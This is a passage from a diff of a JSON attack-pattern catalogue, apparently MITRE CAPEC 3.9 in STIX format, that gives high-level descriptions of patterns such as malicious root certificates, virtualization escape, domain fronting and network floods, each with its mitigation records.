", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the capability to write to the Windows Registry on the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", + "id": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-478-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-26T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.", + "external_references": [ + { + "external_id": "CAPEC-479", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Subvert Trust Controls:Install Root Certificate", + "external_id": "T1553.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/004" + } + ], + "id": "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malicious Root Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the ability to create a new root certificate." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.", + "external_references": [ + { + "external_id": "CAPEC-48", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/48.html" + }, + { + "external_id": "CWE-241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/241.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Core Concepts: Attack Patterns", + "external_id": "REF-416", + "source_name": "reference_from_CAPEC", + "url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html" + } + ], + "id": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Passing Local Filenames to Functions That Expect a URL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains\n hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20\n Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify web application URL inputs: Review application inputs to find those that are designed to be URLs.

    2. Techniques
    Manually navigate web site pages to identify URLs.
    Use automated tools to identify URLs.

Experiment

  1. Identify URL inputs allowing local access.: Execute test local commands via each URL input to determine which are successful.

    2. Techniques
    Manually execute a local command (such as 'pwd') via the URL inputs.
    Using an automated tool, test each URL input for weakness.

Exploit

  1. Execute malicious commands: Using the identified URL inputs that allow local command execution, execute malicious commands.

    2. Techniques
    Execute local commands via the URL input.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser" + ], + "x_capec_skills_required": { + "Medium": "Attacker identifies known local files to exploit" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.", + "id": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-48-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9b80a78-9847-4310-b5a4-59689e59d949", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--840a14c4-8158-43a5-9dbf-7913a86a244f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf36118d-637c-4216-a672-9f18e372b78c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3cc7fae-f66b-4499-8930-bca7d098c80c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e8384c4-b7dc-49d2-990a-83e058990579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.", + "external_references": [ + { + "external_id": "CAPEC-480", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/480.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Escape to Host", + "external_id": "T1611", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1611" + } + ], + "id": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Escaping Virtualization", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.

    2. Techniques
    Probing applications, services, or devices for virtualization weaknesses.

Experiment

  1. Verify the exploitable security weaknesses: Using the found weakness, the adversary attempts to escape the virtualized environment.

    2. Techniques
    Using an application weakness to escape a virtualized environment

Exploit

  1. Execute more complex attacks: Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.

    2. Techniques
    Executing complex attacks when given higher permissions by escaping a virtualized environment
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure virtualization software is current and up-to-date.", + "id": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2cbe557-9342-4193-a6f9-e79a120bbc41", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Abide by the least privilege principle to avoid assigning users more privileges than necessary.", + "id": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2bfc97de-cce3-45f4-b6d9-b32d60e99c84", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.", + "external_references": [ + { + "external_id": "CAPEC-481", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Proxy:Domain Fronting", + "external_id": "T1090.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/004" + } + ], + "id": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contradictory Destinations in Traffic Routing Schemes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.", + "If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN." + ], + "x_capec_skills_required": { + "Medium": "The adversary must have some knowledge of how messages are routed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.", + "id": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-481-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32b657af-ab17-46cd-9717-b3b289f2f295", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "target_ref": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.", + "id": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-482-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--927e4fec-c04f-40f4-becb-c817045ecf24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "target_ref": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-484", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/484.html" + } + ], + "id": "attack-pattern--59a00678-cf9d-461d-91b6-bfa53fd4f0bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Client-Side Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-485", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/485.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "description": "Unsecure Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "P.J. Leadbitter, D. Page, N.P. Smart, Attacking DSA Under a Repeated Bits Assumption, 2004--07, http://www.iacr.org/archive/ches2004/31560428/31560428.pdf", + "external_id": "REF-419", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Debian Security, DSA-1571-1 openssl -- predictable random number generator, 2008--05---13, http://www.debian.org/security/2008/dsa-1571", + "external_id": "REF-420", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Recreation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.", + "An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer." + ], + "x_capec_skills_required": { + "High": "Ability to create malformed data blobs and know how to present them directly or indirectly to a victim." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure cryptographic elements have been sufficiently tested for weaknesses.", + "id": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-485-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e7e94d-1991-4bfc-ae5f-1379eb9e797a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "target_ref": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-486", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "UDP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-486-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d51664cd-4d4a-4d9d-a633-187820aacb6a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "target_ref": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-487", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/487.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ICMP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-487-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 